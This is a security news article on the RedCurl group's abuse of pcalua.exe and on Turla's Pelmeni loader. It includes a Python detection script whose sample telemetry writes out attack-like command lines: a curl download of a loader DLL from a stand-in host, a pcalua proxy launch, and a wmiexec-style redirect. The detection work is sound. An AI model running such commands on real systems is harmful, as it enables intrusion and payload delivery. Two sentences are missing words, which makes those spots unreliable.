
RedCurl Cybercrime Group Exploits Windows PCA for Malicious Activities

The cybercrime group RedCurl, which primarily operates in -speaking countries, has been abusing a legitimate Windows component, the Program Compatibility Assistant (PCA), to carry out its malicious activity. According to a recent analysis by Trend Micro, the group uses the utility to execute commands in a way that sidesteps security controls and makes its actions harder to detect.

pcalua.exe, the launcher for the Program Compatibility Assistant service, exists to detect and work around compatibility problems with older programs. Because pcalua.exe -a <program> starts an arbitrary executable on the caller's behalf, RedCurl uses it as an alternative command-line interpreter: the payload runs as the child of a signed, trusted Windows binary, which obscures where it really came from. The group, also tracked as Earth Kapre and Red Wolf, has been active since 2018 and targets entities in Australia, Canada, Germany, Russia, Slovenia, the U.K., Ukraine, and the U.S.

In a recent investigation, F.A.C.C.T. revealed that a central bank and an Australian company were targeted by RedCurl in November 2022 and May 2023, respectively. The attack chain starts with emails carrying malicious attachments, uses cmd.exe to download the legitimate curl utility, and then deploys a loader DLL (ms.dll or ps.dll) that establishes a connection to a remote server. The loader in turn uses PCA to spawn a downloader process, which connects to the same domain that curl had already contacted.

The group also uses the open-source Impacket toolkit for unauthorized command execution. That tooling, together with overlaps in the command-and-control infrastructure and similarities with known downloader artifacts, is what led the researchers to attribute these attacks to RedCurl.
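The chain described in the two paragraphs above (cmd.exe launching curl, a loader that proxies a downloader through pcalua.exe, the downloader reusing curl's domain, and Impacket-style command execution) can be turned into process-creation and network-connection detections. The script below is an added example, not code from Trend Micro, F.A.C.C.T. or the reports they published. The telemetry it runs over is constructed to resemble Sysmon Event ID 1/3 records; every path, hostname and PID is hypothetical, the choice of rundll32.exe as the host for the loader DLL is an assumption, and the Impacket rule keys on the default output redirection that wmiexec.py performs (cmd.exe /Q /c ... 1> \\127.0.0.1\ADMIN$\__<timestamp> 2>&1), not on anything the article quotes.

```python
from __future__ import annotations

import re
from dataclasses import dataclass
from urllib.parse import urlparse


@dataclass(frozen=True)
class ProcessCreate:
    """Fields borrowed from Sysmon Event ID 1 / Security 4688."""
    pid: int
    image: str
    command_line: str
    parent_image: str


@dataclass(frozen=True)
class NetworkConnect:
    """Fields borrowed from Sysmon Event ID 3."""
    pid: int
    dest_host: str


@dataclass(frozen=True)
class Finding:
    rule: str
    pid: int
    detail: str


# Constructed telemetry modelled on the chain in the article. Paths, hostnames
# and PIDs are hypothetical; rundll32.exe hosting the loader is an assumption.
PROC_EVENTS = [
    ProcessCreate(4201, r"C:\Windows\System32\cmd.exe",
                  r"cmd.exe /c C:\ProgramData\curl.exe -o C:\ProgramData\ms.dll https://cdn.example-update.test/ms.dll",
                  r"C:\Windows\explorer.exe"),
    ProcessCreate(4202, r"C:\ProgramData\curl.exe",
                  r"C:\ProgramData\curl.exe -o C:\ProgramData\ms.dll https://cdn.example-update.test/ms.dll",
                  r"C:\Windows\System32\cmd.exe"),
    ProcessCreate(4203, r"C:\Windows\System32\rundll32.exe",
                  r"rundll32.exe C:\ProgramData\ms.dll,Start", r"C:\Windows\explorer.exe"),
    ProcessCreate(4204, r"C:\Windows\System32\pcalua.exe",
                  r"pcalua.exe -a C:\ProgramData\dl.exe", r"C:\Windows\System32\rundll32.exe"),
    ProcessCreate(4205, r"C:\ProgramData\dl.exe", r"C:\ProgramData\dl.exe",
                  r"C:\Windows\System32\pcalua.exe"),
    ProcessCreate(4206, r"C:\Windows\System32\cmd.exe",
                  r"cmd.exe /Q /c whoami 1> \\127.0.0.1\ADMIN$\__1710000000.5 2>&1",
                  r"C:\Windows\System32\wbem\WmiPrvSE.exe"),
    # Benign controls: PCA opened interactively, and a legacy installer run via -a.
    ProcessCreate(4207, r"C:\Windows\System32\pcalua.exe", r"pcalua.exe",
                  r"C:\Windows\explorer.exe"),
    ProcessCreate(4208, r"C:\Windows\System32\pcalua.exe",
                  r"pcalua.exe -a C:\Program Files\OldApp\setup.exe", r"C:\Windows\explorer.exe"),
]
NET_EVENTS = [
    NetworkConnect(4202, "cdn.example-update.test"),  # curl fetching the loader
    NetworkConnect(4205, "cdn.example-update.test"),  # downloader reusing the domain
    NetworkConnect(4203, "wpad.corp.test"),           # unrelated noise
]

SYSTEM_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
URL_RE = re.compile(r"https?://[^\s\"']+", re.I)
PCALUA_TARGET_RE = re.compile(r'(?i)(?:^|\s)-a\s+"?([^"]+?)"?(?:\s+-c\b|$)')
WMIEXEC_RE = re.compile(r"\\\\127\.0\.0\.1\\ADMIN\$\\__\d+")


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def under_system_dir(path: str) -> bool:
    return path.lower().startswith(SYSTEM_PREFIXES)


def detect_pcalua_abuse(ev: ProcessCreate) -> list[Finding]:
    """pcalua.exe -a <target> used as a proxy launcher, plus anything it spawns."""
    out = []
    if basename(ev.image) == "pcalua.exe":
        m = PCALUA_TARGET_RE.search(ev.command_line)
        if m:
            target = m.group(1).strip()
            # Suspicious when the target lives outside system dirs or PCA was not started by the shell.
            if not under_system_dir(target) or basename(ev.parent_image) != "explorer.exe":
                out.append(Finding("pcalua_proxy_launch", ev.pid,
                                   f"pcalua.exe -a {target} (parent {basename(ev.parent_image)})"))
    if basename(ev.parent_image) == "pcalua.exe":
        out.append(Finding("pcalua_child_process", ev.pid, f"{ev.image} spawned by pcalua.exe"))
    return out


def detect_cmd_curl_download(ev: ProcessCreate) -> list[Finding]:
    """curl launched by cmd.exe and writing a remote file to disk."""
    if basename(ev.image) != "curl.exe" or basename(ev.parent_image) != "cmd.exe":
        return []
    url = URL_RE.search(ev.command_line)
    if not url or not re.search(r"(?:^|\s)(?:-o|-O|--output|--remote-name)\b", ev.command_line):
        return []
    host = urlparse(url.group(0)).hostname
    where = "" if under_system_dir(ev.image) else " (curl binary outside system dirs)"
    return [Finding("cmd_curl_download", ev.pid, f"fetch from {host}{where}")]


def detect_impacket_wmiexec(ev: ProcessCreate) -> list[Finding]:
    """wmiexec.py's default redirection of command output to the local ADMIN$ share."""
    if basename(ev.image) == "cmd.exe" and WMIEXEC_RE.search(ev.command_line):
        return [Finding("impacket_wmiexec", ev.pid,
                        f"output redirected to ADMIN$ (parent {basename(ev.parent_image)})")]
    return []


def correlate_shared_domain(nets: list[NetworkConnect], findings: list[Finding]) -> list[Finding]:
    """A pcalua-spawned process contacting a host first seen in a curl download."""
    curl_pids = {f.pid for f in findings if f.rule == "cmd_curl_download"}
    child_pids = {f.pid for f in findings if f.rule == "pcalua_child_process"}
    download_hosts = {n.dest_host for n in nets if n.pid in curl_pids}
    return [Finding("shared_c2_domain", n.pid, f"{n.dest_host} reused by pcalua child")
            for n in nets if n.pid in child_pids and n.dest_host in download_hosts]


def run_detections(procs: list[ProcessCreate], nets: list[NetworkConnect]) -> list[Finding]:
    findings: list[Finding] = []
    for ev in procs:
        findings += detect_pcalua_abuse(ev) + detect_cmd_curl_download(ev) + detect_impacket_wmiexec(ev)
    findings += correlate_shared_domain(nets, findings)
    return findings


if __name__ == "__main__":
    for f in run_detections(PROC_EVENTS, NET_EVENTS):
        print(f"[{f.rule}] pid={f.pid} {f.detail}")
```

On the constructed sample the two benign pcalua.exe events (interactive launch, and a legacy installer under Program Files started from explorer.exe) produce nothing, while the proxied downloader, its child, the curl download from cmd.exe, the wmiexec-style redirection, and the reuse of the download domain by the pcalua child each raise a finding. In production the per-host correlation would normally run in the SIEM rather than in Python, but the rule logic is the same.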

This discovery highlights the ongoing threat posed by RedCurl, a group that targets a wide range of industries across multiple countries. Its reliance on built-in or legitimate tooling such as PowerShell, curl, and PCA shows how much effort it puts into evading detection inside targeted networks.

In a separate incident, the nation-state group Turla has been using a new wrapper DLL called Pelmeni to deploy the .NET-based Kazuar. The DLL, which masquerades as a legitimate library, is loaded through DLL and then decrypts and launches Kazuar. This layering makes it harder for security tooling to spot the malicious activity.

These developments are a reminder of the constant pressure from both criminal and state-backed threat actors, and of the need for organizations to stay vigilant and keep their security measures current.

Deitasoft © 2024. All Rights Reserved.